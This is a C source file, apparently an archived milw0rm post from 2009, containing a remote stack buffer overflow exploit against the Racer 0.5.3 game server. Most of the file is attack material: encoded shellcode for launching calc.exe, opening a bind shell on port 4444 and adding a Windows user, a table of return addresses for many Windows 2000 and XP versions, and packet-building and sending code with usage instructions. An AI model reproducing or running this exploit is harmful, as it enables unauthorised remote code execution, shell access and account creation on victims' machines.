392 lines
No EOL
17 KiB
C
392 lines
No EOL
17 KiB
C
/*
|
|
Racer vs 0.5.3 beta 5 Remote Stack Buffer Overflow(C) exploit by fl0 fl0w
|
|
--------------------------------------------------------------------------------------------------
|
|
Description : Bug found some time ago by n00b (Cheers mate ! :D) ,I wanted to make a more
|
|
improved sploit , with lots of targets to chose from , and C yes is better :D.
|
|
--------------------------------------------------------------------------------------------------
|
|
Tested on Win Xp Pro Sp 3 ; Compile DevC++ 4.9.9.2
|
|
--------------------------------------------------------------------------------------------------
|
|
Command line arguments : -ip ->the ip of your target default is 127.0.0.1
|
|
-port ->default port is 26000
|
|
-shellcode ->well guess.. :D
|
|
--------------------------------------------------------------------------------------------------
|
|
What does the exploit do ?
|
|
You can run :Calc.exe, Bind shell on port 4444, Win32 Adduser
|
|
I've set the default port 26000 and ip 127.0.0.1 .
|
|
--------------------------------------------------------------------------------------------------
|
|
How to use ? Method ?
|
|
-t 10 -ip 127.0.0.1 -port 26000
|
|
Classic buffer overflow , just jump to the payload and done !
|
|
It can be exploited using SEH method too.
|
|
*/
|
|
|
|
|
|
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <time.h>
|
|
#ifdef WIN32
|
|
#include "winsock2.h"
|
|
#pragma comment(lib, "ws2_32")
|
|
#else
|
|
#include <sys/socket.h>
|
|
#include <sys/types.h>
|
|
#include <netinet/in.h>
|
|
#include <netinet/in_systm.h>
|
|
#include <netinet/ip.h>
|
|
#include <netdb.h>
|
|
#include <arpa/inet.h>
|
|
#include <unistd.h>
|
|
#include <stdlib.h>
|
|
#include <fcntl.h>
|
|
#endif
|
|
|
|
|
|
char packet[2000];
|
|
|
|
|
|
#ifdef WIN32
|
|
WSADATA wsadata;
|
|
#endif
|
|
|
|
|
|
|
|
struct {
|
|
|
|
const char *name;
|
|
int size;
|
|
char *shellcode;
|
|
} set[] = {
|
|
{
|
|
"Run Calc.exe" , 339 ,
|
|
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
|
|
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
|
|
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
|
|
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
|
|
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
|
|
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
|
|
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
|
|
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
|
|
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
|
|
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
|
|
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
|
|
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
|
|
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
|
|
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
|
|
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
|
|
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
|
|
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
|
|
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
|
|
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
|
|
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
|
|
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
|
|
"\x70\x63"
|
|
} ,
|
|
{
|
|
"Bind shell on port 4444" , 238 ,
|
|
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
|
|
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x67"
|
|
"\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x77\x32\x42\x42\x42\x32"
|
|
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x5a\x49\x49\x6c\x72"
|
|
"\x4a\x48\x6b\x32\x6d\x48\x68\x4c\x39\x39\x6f\x39\x6f\x69\x6f\x43"
|
|
"\x50\x6e\x6b\x50\x6c\x66\x44\x41\x34\x4c\x4b\x73\x75\x47\x4c\x6c"
|
|
"\x4b\x43\x4c\x57\x75\x30\x78\x75\x51\x7a\x4f\x4c\x4b\x42\x6f\x34"
|
|
"\x58\x4e\x6b\x41\x4f\x37\x50\x46\x61\x7a\x4b\x42\x69\x4e\x6b\x46"
|
|
"\x54\x6c\x4b\x63\x31\x6a\x4e\x50\x31\x49\x50\x4c\x59\x6e\x4c\x6f"
|
|
"\x74\x49\x50\x32\x54\x74\x47\x6f\x31\x6b\x7a\x44\x4d\x46\x61\x6f"
|
|
"\x32\x4a\x4b\x4a\x54\x77\x4b\x31\x44\x51\x34\x55\x78\x31\x65\x4b"
|
|
"\x55\x6c\x4b\x33\x6f\x75\x74\x63\x31\x38\x6b\x35\x36\x4e\x6b\x44"
|
|
"\x4c\x70\x4b\x4e\x6b\x43\x6f\x55\x4c\x36\x61\x78\x6b\x36\x63\x66"
|
|
"\x4c\x4e\x6b\x6f\x79\x42\x4c\x31\x34\x57\x6c\x75\x31\x78\x43\x75"
|
|
"\x61\x39\x4b\x50\x64\x4c\x4b\x57\x33\x34\x70\x4c\x4b\x77\x30\x64"
|
|
"\x4c\x4c\x4b\x70\x70\x37\x6c\x4c\x6d\x6e\x6b\x61\x50\x74\x48\x31"
|
|
"\x4e\x30\x68\x6c\x4e\x62\x6e\x44\x4e\x78\x6c\x72\x70\x39\x6f\x79"
|
|
"\x46\x63\x56\x76\x33\x70\x66\x42\x48\x56\x53\x37\x42\x53\x58\x62"
|
|
"\x57\x41\x63\x54\x72\x63\x6f\x51\x44\x59\x6f\x5a\x70\x50\x68\x7a"
|
|
"\x6b\x6a\x4d\x4b\x4c\x47\x4b\x62\x70\x59\x6f\x6e\x36\x71\x4f\x6f"
|
|
"\x79\x4d\x35\x43\x56\x6b\x31\x4a\x4d\x33\x38\x34\x42\x31\x45\x52"
|
|
"\x4a\x55\x52\x79\x6f\x6e\x30\x73\x58\x6a\x79\x77\x79\x4c\x35\x4c"
|
|
"\x6d\x52\x77\x39\x6f\x69\x46\x72\x73\x71\x43\x61\x43\x41\x43\x30"
|
|
"\x53\x42\x63\x46\x33\x42\x63\x71\x43\x4b\x4f\x58\x50\x71\x76\x30"
|
|
"\x68\x32\x31\x71\x4c\x65\x36\x41\x43\x6b\x39\x58\x61\x6a\x35\x63"
|
|
"\x58\x59\x34\x76\x7a\x30\x70\x4b\x77\x61\x47\x49\x6f\x4a\x76\x71"
|
|
"\x7a\x42\x30\x53\x61\x41\x45\x6b\x4f\x5a\x70\x53\x58\x6e\x44\x6c"
|
|
"\x6d\x64\x6e\x6d\x39\x36\x37\x49\x6f\x4b\x66\x73\x63\x30\x55\x39"
|
|
"\x6f\x4e\x30\x52\x48\x4d\x35\x41\x59\x6f\x76\x32\x69\x70\x57\x49"
|
|
"\x6f\x4e\x36\x66\x30\x66\x34\x30\x54\x43\x65\x4b\x4f\x4a\x70\x4f"
|
|
"\x63\x63\x58\x39\x77\x50\x79\x68\x46\x64\x39\x36\x37\x39\x6f\x4e"
|
|
"\x36\x70\x55\x4b\x4f\x6e\x30\x63\x56\x31\x7a\x32\x44\x42\x46\x31"
|
|
"\x78\x33\x53\x72\x4d\x4d\x59\x78\x65\x50\x6a\x52\x70\x70\x59\x57"
|
|
"\x59\x38\x4c\x6b\x39\x5a\x47\x31\x7a\x72\x64\x4e\x69\x4b\x52\x70"
|
|
"\x31\x49\x50\x78\x73\x4e\x4a\x4b\x4e\x71\x52\x56\x4d\x6b\x4e\x72"
|
|
"\x62\x34\x6c\x4f\x63\x6e\x6d\x33\x4a\x77\x48\x4e\x4b\x6c\x6b\x4c"
|
|
"\x6b\x55\x38\x32\x52\x6b\x4e\x58\x33\x56\x76\x59\x6f\x70\x75\x43"
|
|
"\x74\x49\x6f\x7a\x76\x43\x6b\x36\x37\x70\x52\x36\x31\x31\x41\x31"
|
|
"\x41\x52\x4a\x54\x41\x70\x51\x51\x41\x50\x55\x63\x61\x6b\x4f\x58"
|
|
"\x50\x73\x58\x4c\x6d\x79\x49\x43\x35\x4a\x6e\x31\x43\x4b\x4f\x7a"
|
|
"\x76\x71\x7a\x59\x6f\x4b\x4f\x64\x77\x6b\x4f\x38\x50\x4c\x4b\x50"
|
|
"\x57\x79\x6c\x4c\x43\x5a\x64\x70\x64\x4b\x4f\x4e\x36\x33\x62\x79"
|
|
"\x6f\x6e\x30\x41\x78\x4c\x30\x6f\x7a\x43\x34\x51\x4f\x50\x53\x79"
|
|
"\x6f\x4a\x76\x4b\x4f\x4e\x30\x67"
|
|
|
|
} ,
|
|
{
|
|
"Win32 Adduser PASS=w00t EXITFUNC=seh USER=w00t" , 238 ,
|
|
"\xfc\xbb\xfb\xe2\x33\x0b\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
|
|
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x07\x0a\x77\x0b\xf7\xcb\xf3"
|
|
"\x4e\xcb\x40\x7f\x54\x4b\x56\x6f\xdd\xe4\x40\xe4\xbd\xda\x71\x11"
|
|
"\x08\x91\x46\x6e\x8a\x4b\x97\xb0\x14\x3f\x5c\xf0\x53\x38\x9c\x3b"
|
|
"\x96\x47\xdc\x57\x5d\x7c\xb4\x83\x9a\xf7\xd1\x47\xfd\xd3\x18\xb3"
|
|
"\x64\x90\x17\x08\xe2\xf9\x3b\x8f\x1f\x8e\x58\x04\xde\x7b\xe9\x46"
|
|
"\xc5\x7f\x29\x47\xc5\x1b\x26\xe8\xf5\x66\xf8\x91\xf9\xe3\xb9\x6d"
|
|
"\x89\x83\x25\xc3\x06\x0b\x5e\xf0\x10\x40\xde\xb6\x23\x56\xdf\x3d"
|
|
"\x4b\x6a\x80\x70\x7a\xf2\x68\xfa\x7a\x71\x54\x87\x2a\x1d\xa5\xf2"
|
|
"\xcf\x82\x2d\x9b\x2e\xb6\xa0\xcc\x31\x21\xdf\x9f\xa9\x83\x45\x18"
|
|
"\x57\xfb\xaa\xbb\xb7\x95\xd1\x4f\x98\x1c\x69\xd5\xaa\xfe\xfa\x25"
|
|
"\x7b\x8a\x24\x31\x4b\x42\x51\x9d\x84\xe3\xdd\x99\xfa\xc5\xfb\x01"
|
|
"\x95\x6c\x70\x62\x05\x01\x1b\x03\xb9\xba\xa9\xac\x34\x34\x6e\x72"
|
|
"\xd3\xd9\x07\x1a\x72\x52\xac\x90\xe5\xe0\x23\x27\x95\x28\xcb\xf7"
|
|
"\x69\x5c\x13\xd7\xc8\xd8\x17\x27\xcb\xe0\x97\x27\xcb"
|
|
},
|
|
{NULL, NULL}
|
|
};
|
|
|
|
#define EIP1 "\x7B\x46\x86\x7C" //Microsoft Windows Xp Pro sp3 JMP ESP Kernel32.dll
|
|
#define EIP2 "\x41\x41\x41\x41" //Test Crash
|
|
#define EIP3 "\xD9\x13\x00\x01" //Microsoft Win XP-Universal 1
|
|
#define NVal -1
|
|
#define EIP4 "\x74\x16\xE8\x77" //Microsoft Windows 2000 SP0 English
|
|
#define EIP5 "\xEC\x29\xE8\x77" //Microsoft Windows XP SP1 English
|
|
#define EIP6 "\xB5\x24\xE8\x77" //Microsoft Windows 2000 SP2 English
|
|
#define EIP7 "\x7A\x36\xE8\x77" //Microsoft Windows 2000 SP3 English
|
|
#define EIP8 "\x9B\x2A\xF9\x77" //Microsoft Windows 2000 SP4 English
|
|
#define EIP9 "\xE3\xAF\xE9\x77" //Microsoft Windows XP SP0 English
|
|
#define EIP10 "\xBA\x26\xE6\x77" //Microsoft Win XP-Universal 2
|
|
|
|
|
|
void Disconnect (SOCKET);
|
|
void Wait_s (int);
|
|
void Usage (char *);
|
|
void Exit (int);
|
|
int wsg (char *, char *);
|
|
void Help ();
|
|
|
|
int main (int argc, char *argv[])
|
|
|
|
{
|
|
if (argc < 6) {
|
|
Help ();
|
|
Exit (0);
|
|
}
|
|
int sskd,
|
|
sw=0;
|
|
char *target,
|
|
*os;
|
|
system ("CLS");
|
|
Help ();
|
|
|
|
if (WSAStartup (MAKEWORD(2,0), &wsadata) != 0) {
|
|
printf("wsastartup error\n");
|
|
NVal -1;
|
|
}
|
|
|
|
int ip = htonl(inet_addr(argv[4]));
|
|
int port = atoi (argv[6]);
|
|
int defaultPort = 26000;
|
|
char *defaultIp = "127.0.0.1";
|
|
//test ip ; If you enter 0 default will be set
|
|
if (atoi (argv[4]) <= 0)
|
|
ip = htonl(inet_addr(defaultIp));
|
|
//test if port is valid ; If you enter 0 the default will be loaded
|
|
if ( atoi (argv[6]) <= 0 || atoi (argv[6]) > 65000)
|
|
port = defaultPort;
|
|
//test line arguments
|
|
if (wsg (argv[1], "-t") == NVal) {
|
|
Usage (argv[0]);
|
|
Exit (0);
|
|
}
|
|
if (wsg (argv[3], "-ip") == NVal) {
|
|
Usage (argv[0]);
|
|
Exit (0);
|
|
}
|
|
if (wsg (argv[5], "-port") == NVal) {
|
|
Usage (argv[0]);
|
|
Exit (0);
|
|
}
|
|
if (wsg (argv[7], "-shellcode") == NVal) {
|
|
Usage (argv[0]);
|
|
Exit (0);
|
|
}
|
|
//endtest
|
|
char *g;
|
|
|
|
SOCKET s;
|
|
fd_set mask;
|
|
struct timeval timeout;
|
|
struct sockaddr_in server;
|
|
s=socket(AF_INET,SOCK_DGRAM,0);
|
|
if (s == -1) {
|
|
perror ("Socket\n");
|
|
return NVal;
|
|
}
|
|
//selecting JMP address
|
|
if (atoi (argv[2]) == 1) {
|
|
g = EIP1;
|
|
os = "win xp pro sp 3 English";
|
|
}
|
|
else
|
|
if (atoi (argv[2]) == 2) {
|
|
g = EIP2;
|
|
os = "boom";
|
|
}
|
|
else
|
|
if (atoi (argv[2]) == 3) {
|
|
g = EIP3;
|
|
os = "win xp pro sp 3 English";
|
|
}
|
|
else
|
|
if (atoi (argv[2]) == 4) {
|
|
g = EIP4;
|
|
os = "boom";
|
|
}
|
|
else
|
|
if (atoi (argv[2]) == 5) {
|
|
g = EIP5;
|
|
os = "win xp pro sp 3 English";
|
|
}
|
|
else
|
|
if (atoi (argv[2]) == 6) {
|
|
g = EIP6;
|
|
os = "boom";
|
|
}
|
|
else
|
|
if (atoi (argv[2]) == 7) {
|
|
g = EIP7;
|
|
os = "win xp pro sp 3 English";
|
|
}
|
|
else
|
|
if (atoi (argv[2]) == 8) {
|
|
g = EIP8;
|
|
os = "boom";
|
|
}
|
|
else
|
|
if (atoi (argv[2]) == 9) {
|
|
g = EIP9;
|
|
os = "win xp pro sp 3 English";
|
|
}
|
|
else
|
|
if (atoi (argv[2]) == 10) {
|
|
g = EIP10;
|
|
os = "boom";
|
|
}
|
|
//endselect
|
|
system ("cls");
|
|
printf ("--------------------------\n");
|
|
printf ("*Preparing connection...\n");
|
|
Wait_s (500);
|
|
server.sin_family=AF_INET;
|
|
server.sin_addr.s_addr=htonl(ip);
|
|
server.sin_port=htons(port);
|
|
//core of exploit
|
|
int i;
|
|
do {
|
|
packet[i] = 'E';
|
|
i++;
|
|
}while (i < 2000);
|
|
|
|
printf ("*Building buffer...\n");
|
|
Wait_s (500);
|
|
memset (packet,0x90,2000);
|
|
memcpy (packet + 1001, g, 4);
|
|
|
|
if (atoi (argv[8]) == 0)
|
|
memcpy (packet + 1005 , (char*)set[0].shellcode, strlen ((char*)set[0].shellcode));
|
|
else
|
|
if (atoi (argv[8]) == 1)
|
|
memcpy (packet + 1005 , (char*)set[1].shellcode, strlen ((char*)set[1].shellcode));
|
|
else
|
|
if (atoi (argv[8]) == 2)
|
|
memcpy (packet + 1005 , (char*)set[2].shellcode, strlen ((char*)set[2].shellcode));
|
|
printf ("*Sending packets...\n");
|
|
Wait_s (500);
|
|
|
|
sskd = sendto(s, packet, sizeof (packet), 0, (struct sockaddr *)&server, sizeof (server));
|
|
//endcore
|
|
timeout.tv_sec=10;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
|
|
sw = select((s+1),&mask,NULL,NULL,&timeout);
|
|
if(sw)
|
|
{
|
|
perror ("Server \n");
|
|
Disconnect (s);
|
|
return -1;
|
|
}
|
|
else
|
|
{ printf ("*you can get shell now ! if calc isn't launched already ...:))\n");
|
|
printf ("*Success !\n");
|
|
printf ("-------------------------\n");
|
|
Help ();
|
|
Disconnect (s);
|
|
return 0;
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
int wsg (char *name1, char *name2)
|
|
{
|
|
if (strcmp (name1, name2) == 0)
|
|
return 1;
|
|
return NVal;
|
|
}
|
|
|
|
void Usage (char *name)
|
|
{
|
|
printf ("Usage is: %s -t 1->4 -ip 127.0.0.1 -port 26000\n", name);
|
|
}
|
|
void Help ()
|
|
{
|
|
fputs (
|
|
"********** ********************************** ************** **********\n"
|
|
"::::Racer vs 0.5.3 Remote Stack Buffer Overflow Exploit (C):::: \n"
|
|
":::: By fl0 fl0w :::: \n"
|
|
"\t-t ->target-> "
|
|
" \n"
|
|
"\t\tMicrosoft Win XP-Universal \n"
|
|
"\t\tMicrosoft Windows XP SP0 English \n"
|
|
"\t\tMicrosoft Windows XP SP1 English \n"
|
|
"\t\tMicrosoft Win XP Pro sp3 English \n"
|
|
"\t\tMicrosoft Windows 2000 SP0 English \n"
|
|
"\t\tMicrosoft Windows 2000 SP1 English \n"
|
|
"\t\tMicrosoft Windows 2000 SP2 English \n"
|
|
"\t\tMicrosoft Windows 2000 SP3 English \n"
|
|
"\t\tMicrosoft Windows 2000 SP4 English \n"
|
|
" \n"
|
|
"\t-ip ->the ip of your target default is 127.0.0.1 \n"
|
|
" \n"
|
|
"\t-port ->default port is 26000 \n"
|
|
" \n"
|
|
"\t-shellcode ->well guess.. :D \n"
|
|
"\t\t {1}Run Calc.exe \n"
|
|
"\t\t {2}Bind shell on port 4444 \n"
|
|
"\t\t {3}Win32 Adduser PASS=w00t EXITFUNC=seh USER=w00t \n"
|
|
"\n"
|
|
"EXAMPLE"
|
|
" Usage is: -t 10 -ip 127.0.0.1 -port 26000 "
|
|
,stdout);
|
|
}
|
|
void Exit (int t)
|
|
{
|
|
exit (t);
|
|
}
|
|
void Wait_s (int seconds)
|
|
{
|
|
Sleep (seconds);
|
|
}
|
|
|
|
void Disconnect (SOCKET S)
|
|
{
|
|
closesocket(S);
|
|
}
|
|
|
|
// milw0rm.com [2009-03-20]
|